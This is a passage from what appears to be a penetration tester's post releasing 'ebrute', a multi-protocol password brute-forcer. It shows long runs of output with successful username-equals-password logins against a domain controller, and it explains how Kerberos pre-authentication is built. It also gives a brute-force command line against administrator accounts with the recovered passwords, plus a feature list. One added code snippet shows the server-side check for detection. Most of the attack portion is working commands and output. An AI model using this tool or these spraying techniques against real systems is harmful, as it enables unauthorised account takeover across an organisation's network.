[5]  HOST: '192.168.8.88' | USER: 'ANDREWS.WILLIAM' | PASS: 'ANDREWS.WILLIAM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'GREENE.PAUL' | PASS: 'GREENE.PAUL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'GREENE.DANIEL' | PASS: 'GREENE.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'LAWSON.ALVIN' | PASS: 'LAWSON.ALVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[11]  HOST: '192.168.8.88' | USER: 'LAWSON.TIM' | PASS: 'LAWSON.TIM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[31]  HOST: '192.168.8.88' | USER: 'GILBERT.MARK' | PASS: 'GILBERT.MARK' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'DEAN.GORDON' | PASS: 'DEAN.GORDON' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Tasks remaining: 2,437,365    (Performance: ~341,367 tasks/minute, 8 minutes remain)
[25]  HOST: '192.168.8.88' | USER: 'MCCOY.BRIAN' | PASS: 'MCCOY.BRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[28]  HOST: '192.168.8.88' | USER: 'STEELE.EDWIN' | PASS: 'STEELE.EDWIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'SIMON.FRED' | PASS: 'SIMON.FRED' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[2]  HOST: '192.168.8.88' | USER: 'HUBBARD.LUTHER' | PASS: 'HUBBARD.LUTHER' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Tasks remaining: 2,385,922    (Performance: ~342,953 tasks/minute, 8 minutes remain)
[16]  HOST: '192.168.8.88' | USER: 'FLYNN.ADRIAN' | PASS: 'FLYNN.ADRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[8]  HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'ALLISON.BRUCE' | PASS: 'ALLISON.BRUCE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'BRENNAN.TRACY' | PASS: 'BRENNAN.TRACY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'SHANNON.BEN' | PASS: 'SHANNON.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[24]  HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[11]  HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'VILLA.ROGER' | PASS: 'VILLA.ROGER' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[16]  HOST: '192.168.8.88' | USER: 'FARLEY.ROSS' | PASS: 'FARLEY.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[2]  HOST: '192.168.8.88' | USER: 'BARTLETT.ALAN' | PASS: 'BARTLETT.ALAN' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce thread
 (Attempt 1/5)]
Tasks remaining: 2,005,804    (Performance: ~380,118 tasks/minute, 6 minutes remain)
[14]  HOST: '192.168.8.88' | USER: 'LEARY.BEN' | PASS: 'LEARY.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'MARION.ADAM' | PASS: 'MARION.ADAM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[25]  HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'HIGGINBOTHAM.ARNOLD' | PASS: 'HIGGINBOTHAM.ARNOLD' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly r
duce threads (Attempt 1/5)]
[21]  HOST: '192.168.8.88' | USER: 'HIGGINBOTHAM.ROLAND' | PASS: 'HIGGINBOTHAM.ROLAND' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly
educe threads (Attempt 1/5)]
Tasks remaining: 1,611,693    (Performance: ~394,111 tasks/minute, 5 minutes remain)
Tasks remaining: 1,218,180    (Performance: ~393,513 tasks/minute, 4 minutes remain)
Tasks remaining: 824,069    (Performance: ~394,111 tasks/minute, 3 minutes remain)
Increasing theadcount to: 33
Increasing theadcount to: 34
Increasing theadcount to: 35
Increasing theadcount to: 36
Increasing theadcount to: 37
Increasing theadcount to: 38
Increasing theadcount to: 39
Increasing theadcount to: 40
[28]  HOST: '192.168.8.88' | USER: 'MERRIWEATHER.DALE' | PASS: 'MERRIWEATHER.DALE' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly redu
e threads (Attempt 1/5)]
Tasks remaining: 413,452    (Performance: ~410,617 tasks/minute, 2 minutes remain)
[19]  HOST: '192.168.8.88' | USER: 'SENG.MARIO' | PASS: 'SENG.MARIO' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
empt 1/5)]
[38]  HOST: '192.168.8.88' | USER: 'DANKO.SCOTT' | PASS: 'DANKO.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
ttempt 1/5)]
[8]  HOST: '192.168.8.88' | USER: 'TORIBIO.DARRELL' | PASS: 'TORIBIO.DARRELL' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce th
eads (Attempt 1/5)]
Tasks remaining: 2,581    (Performance: ~410,871 tasks/minute, 1 minutes remain)
Complete: 07/12/2011 11:27:44
Stats:    00:06:13    (~401,925 tasks/minute) (Performed 2,500,000 / 2,500,000 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'SMITH.RONNIE' | PASS: 'SMITH.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JOHNSON.PHILIP' | PASS: 'JOHNSON.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILLIAMS.HUGH' | PASS: 'WILLIAMS.HUGH' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROWN.STEVEN' | PASS: 'BROWN.STEVEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROWN.DANIEL' | PASS: 'BROWN.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.JAIME' | PASS: 'JONES.JAIME' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.KEN' | PASS: 'JONES.KEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.BOB' | PASS: 'JONES.BOB' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MILLER.PHILIP' | PASS: 'MILLER.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GARCIA.KEVIN' | PASS: 'GARCIA.KEVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILSON.JOHN' | PASS: 'WILSON.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILSON.ROBERT' | PASS: 'WILSON.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.GARY' | PASS: 'ANDERSON.GARY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.TIMOTHY' | PASS: 'ANDERSON.TIMOTHY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.DEAN' | PASS: 'ANDERSON.DEAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LEE.HENRY' | PASS: 'LEE.HENRY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CLARK.TONY' | PASS: 'CLARK.TONY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CLARK.BRYAN' | PASS: 'CLARK.BRYAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ALLEN.RON' | PASS: 'ALLEN.RON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.JOHN' | PASS: 'SCOTT.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.ROBERT' | PASS: 'SCOTT.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.MICHAEL' | PASS: 'SCOTT.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ADAMS.BYRON' | PASS: 'ADAMS.BYRON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ADAMS.JULIAN' | PASS: 'ADAMS.JULIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HILL.STUART' | PASS: 'HILL.STUART' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HILL.AUSTIN' | PASS: 'HILL.AUSTIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MITCHELL.TODD' | PASS: 'MITCHELL.TODD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'EVANS.JOHNNY' | PASS: 'EVANS.JOHNNY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.ERIC' | PASS: 'TURNER.ERIC' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.SCOTT' | PASS: 'TURNER.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.RICKY' | PASS: 'TURNER.RICKY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'EDWARDS.HOWARD' | PASS: 'EDWARDS.HOWARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BAILEY.FRANCIS' | PASS: 'BAILEY.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'KELLY.MICHAEL' | PASS: 'KELLY.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DIAZ.RICARDO' | PASS: 'DIAZ.RICARDO' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WOOD.JIM' | PASS: 'WOOD.JIM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BENNETT.DARYL' | PASS: 'BENNETT.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BENNETT.JEFF' | PASS: 'BENNETT.JEFF' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GRAY.NORMAN' | PASS: 'GRAY.NORMAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ORTIZ.JOHNNIE' | PASS: 'ORTIZ.JOHNNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HENDERSON.CHAD' | PASS: 'HENDERSON.CHAD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'KIM.DARYL' | PASS: 'KIM.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FORD.ROSS' | PASS: 'FORD.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CRAWFORD.KENT' | PASS: 'CRAWFORD.KENT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HUNTER.TROY' | PASS: 'HUNTER.TROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HOLMES.FREDDIE' | PASS: 'HOLMES.FREDDIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROSE.MARCUS' | PASS: 'ROSE.MARCUS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MEDINA.JACKIE' | PASS: 'MEDINA.JACKIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CUNNINGHAM.RONNIE' | PASS: 'CUNNINGHAM.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.ROBERT' | PASS: 'ANDREWS.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.MICHAEL' | PASS: 'ANDREWS.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.DAVID' | PASS: 'ANDREWS.DAVID' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.WILLIAM' | PASS: 'ANDREWS.WILLIAM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GREENE.PAUL' | PASS: 'GREENE.PAUL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GREENE.DANIEL' | PASS: 'GREENE.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LAWSON.ALVIN' | PASS: 'LAWSON.ALVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LAWSON.TIM' | PASS: 'LAWSON.TIM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GILBERT.MARK' | PASS: 'GILBERT.MARK' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DEAN.GORDON' | PASS: 'DEAN.GORDON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MCCOY.BRIAN' | PASS: 'MCCOY.BRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'STEELE.EDWIN' | PASS: 'STEELE.EDWIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SIMON.FRED' | PASS: 'SIMON.FRED' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HUBBARD.LUTHER' | PASS: 'HUBBARD.LUTHER' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FLYNN.ADRIAN' | PASS: 'FLYNN.ADRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ALLISON.BRUCE' | PASS: 'ALLISON.BRUCE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BRENNAN.TRACY' | PASS: 'BRENNAN.TRACY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SHANNON.BEN' | PASS: 'SHANNON.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'VILLA.ROGER' | PASS: 'VILLA.ROGER' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FARLEY.ROSS' | PASS: 'FARLEY.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LEARY.BEN' | PASS: 'LEARY.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MARION.ADAM' | PASS: 'MARION.ADAM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'


You now have many more user accounts to guess passwords for.

Kerberos Authentication
The Kerberos authentication plugin was written after establishing which cipher suites each version of Windows supports and reading the RFCs.

Lots of different cipher suites are supported:
  • AES256-CTS-HMAC-SHA1-96
  • AES128-CTS-HMAC-SHA1-96
  • RC4-HMAC
  • DES-CBC-MD5
  • DES-CBC-CRC
Send an AS-REQ using one of the ciphers above
  • RC4-HMAC supported across Windows 2000/2003/2008
  • K = MD4 of the user password (the NTLM hash)
  • K1 = HMAC-MD5(K, MessageType)
  • Checksum = HMAC-MD5(K1,Timestamp)
  • K3 = HMAC-MD5(K1,Checksum)
  • EncryptedTimestamp = RC4(Timestamp,K3)
  • Request includes a concatenation of the Checksum and EncryptedTimestamp
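The RC4-HMAC steps listed above, seen from the KDC's side, as an added example that is not ebrute's code: the KDC re-derives K1 and K3 and recomputes the checksum, so every wrong guess surfaces as a KDC_ERR_PREAUTH_FAILED that can be logged and alerted on. It assumes key usage 1 as the MessageType and the 8-byte confounder that RFC 4757 prepends to the timestamp (not shown in the list), takes K as a ready-made NT hash, and uses constructed sample values; the function names are hypothetical.

```python
import hashlib
import hmac
import os
from datetime import datetime, timedelta, timezone

KEY_USAGE = 1  # assumption: "MessageType" = RFC 4757 key usage 1 (AS-REQ PA-ENC-TIMESTAMP)
# DER header for SEQUENCE { [0] GeneralizedTime (15 bytes) }, optional pausec omitted
DER_PREFIX = bytes.fromhex("3013a011180f")
TIME_FMT = "%Y%m%d%H%M%SZ"

# Constructed sample keys: well-known NT hashes (MD4 of the UTF-16LE password)
K_PASSWORD = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")  # "password"
K_EMPTY = bytes.fromhex("31d6cfe0d16ae931b73c59d7e0c089c0")     # empty password


def rc4(key, data):
    """Plain RC4: key scheduling followed by keystream XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key, msg):
    return hmac.new(key, msg, hashlib.md5).digest()


def seal_timestamp(k, when, confounder=None):
    """Client side: return Checksum || RC4(K3, confounder || timestamp)."""
    k1 = hmac_md5(k, KEY_USAGE.to_bytes(4, "little"))
    plain = (confounder or os.urandom(8)) + DER_PREFIX + when.strftime(TIME_FMT).encode()
    checksum = hmac_md5(k1, plain)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, plain)


def kdc_check(k, blob, now, max_skew=timedelta(minutes=5)):
    """KDC side: verify the blob against the stored key K and the KDC clock."""
    if len(blob) != 16 + 8 + len(DER_PREFIX) + 15:
        return "malformed"
    checksum, cipher = blob[:16], blob[16:]
    k1 = hmac_md5(k, KEY_USAGE.to_bytes(4, "little"))
    k3 = hmac_md5(k1, checksum)
    plain = rc4(k3, cipher)
    # A wrong key yields garbage here, so the recomputed checksum cannot match.
    if not hmac.compare_digest(hmac_md5(k1, plain), checksum):
        return "KDC_ERR_PREAUTH_FAILED"
    body = plain[8:]  # drop the confounder
    if not body.startswith(DER_PREFIX):
        return "malformed"
    try:
        ts = datetime.strptime(body[len(DER_PREFIX):].decode("ascii"), TIME_FMT)
    except ValueError:
        return "malformed"
    ts = ts.replace(tzinfo=timezone.utc)
    return "ok" if abs(now - ts) <= max_skew else "KRB_AP_ERR_SKEW"


if __name__ == "__main__":
    now = datetime(2011, 12, 6, 15, 46, 12, tzinfo=timezone.utc)  # constructed clock
    blob = seal_timestamp(K_PASSWORD, now)
    print("right key:", kdc_check(K_PASSWORD, blob, now))
    print("wrong key:", kdc_check(K_EMPTY, blob, now))
    print("stale    :", kdc_check(K_PASSWORD, blob, now + timedelta(minutes=10)))
```

Because the check fails closed on any key mismatch, a burst of pre-authentication failures for one account or from one source is the signal to look for on the domain controller.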
The example below demonstrates the Kerberos authentication plugin:

C:\tools\dev\br>ebrute -r kerbauth -u abc,administrator,test -j -n -P c:\tools\wl\std.txt -h 192.168.8.23 -e win2k3r2domain -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Added:    3 user(s), 28,881 password(s), 1 host(s),  + joeycheck  + blankcheck 86,649 tasks over 32 thread/s.
Starting: 06/12/2011 15:46:12
[21]  HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'Passw0rd123' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[13]  HOST: '192.168.8.23' | USER: 'test' | PASS: 'password' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
Complete: 06/12/2011 15:46:37
Stats:    00:00:25    (~136,486 tasks/minute) (Performed 56,918 / 86,649 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'Passw0rd123' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test' | PASS: 'password' | EXTRA: 'win2k3r2domain' | Return code: 'Success'

Of course you could also use LDAP, SMB and FTP but kerberos is a lot quicker.
NB: The Kerberos authentication plugin only runs over UDP at the moment, so if you are getting errors you will have to resort to one of the other plugins. The Kerberos enumeration plugin runs over both UDP and TCP, with UDP being the quicker.

ebrute - service brute-forcer


I thought it was about time that I released my service brute-forcer. It does a lot of what the other brute-forcers do but has some nice features which I find essential on pen tests. In particular, I wrote a kerberos enumeration plugin which allows you to validate the existence of user accounts on locked down (no enumeration over null sessions or via RID cycling) Windows 2k/2k3/2k8 domain controllers without using a password guess. On a decent server you can validate over a million user accounts a minute and with some clever dictionaries typically obtain around 70% of the domain user accounts. See the blog post for more details. Key features:

Large protocol support
  • FTP
  • FINGER (used for seeing output e.g. root@ etc.)
  • KERBENUM (Fast username validation without using a password guess against Windows2k/2k3/2k8 Domain Controllers)
  • KERBAUTH (Fast authentication on Domain Controllers)
  • LDAP (Nearly as fast domain/non-domain brute force)
  • Local authentication (quick priv esc approx 800,000 guesses a minute)
  • MSSQL (raw TDS, ODBC, OLEDB and managed driver support to try and prevent any strange failures)
  • MYSQL
  • Oracle password checking (turns it from a ~4meg app to ~80meg :-( so this is temporarily out)
  • Oracle SID brute forcing (turns it from a ~4meg app to ~80meg :-( so this is temporarily out)
  • POP3
  • POSTGRES
  • Process (shell your own processes and look at the exit code)
  • SMB via the API(LM, NTLM and more importantly NTLMv2)
  • SMB via raw packets (LMv2 and NTLMv2 with dictionary/hashes)
  • SMTP (BASIC, cram, NTLM)
  • SNMP (v2 community name support only at the sec)
  • SSH (2 implementations, both seem similar but sometimes one works better than the other)
  • TFTP (brute force valid files)
  • VMWARE (virtual centre and ESX server authentications)
  • VNC
  • WMI useful if you only have TCP port 135 open
  • WWW (BASIC, DIGEST, NTLM and more importantly NTLMv2)
  • Also some quick fuzzers, random TCP/UDP data, random TCP data with a valid TKPT header 
Decent feedback
  • Tells you progress each minute with an estimated finish time
  • Pause and resume the job - useful if looking at wireshark or temporarily switching VLANs (p key)
  • Increase and Decrease the threads mid flow (-+ keys)
  • Press any key for instant updates
  • Increase and decrease debug level while it is running (v/b)
  • Says why things are succeeding/failing, i.e. not just that it failed
  • Attempts to tell you if remote auth is even enabled (e.g. mssql, mysql, postgres)
  • Optionally log all output to a file  
Powerful username, password and host inputs
  • read a single user or pass
  • read users or passes from a file
  • prefix a constant onto a username or pass
  • add a constant onto the end of a username or pass
  • set min max lengths for user and pass inputs
  • switch for checking for blank and or joey passwords
  • input users and passes from a list
  • read a single host
  • read hosts from a file
  • use hosts and services specified from nmap/nessus output
Other bits
  • Shared password optimization (i.e. spread your attempts across hosts sharing the same creds like a local admin pass...)
  • Port scanner built in so just give it a range e.g. 192.168.8.1-254
  • Auto retries on failed attempts 5 times
  • Configurable port, ssl options and timeouts (although not all plugins support this at the sec)
